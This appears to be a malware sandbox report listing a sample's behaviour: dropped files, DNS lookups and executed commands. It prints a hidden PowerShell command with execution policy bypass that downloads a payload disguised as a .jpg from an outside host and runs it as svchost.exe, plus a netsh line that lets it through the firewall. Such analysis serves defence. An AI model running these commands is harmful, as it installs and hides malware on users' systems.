Technical Information
- https://g.top4top.io/p_1697idvgm1.jpg as %temp%\svchost.exe
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%TEMP%\svchost.exe" "svchost.exe" ENABLE
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\svchost.exe
- 'localhost':5553
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK g.###4top.io
- '%TEMP%\svchost.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://g.top4top.io/p_1697idvgm1.jpg','%TEMP%\svchost.exe');Start-Process '...' (with hidden window)
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%TEMP%\svchost.exe" "svchost.exe" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://g.top4top.io/p_1697idvgm1.jpg','%TEMP%\svchost.exe');Start-Process '...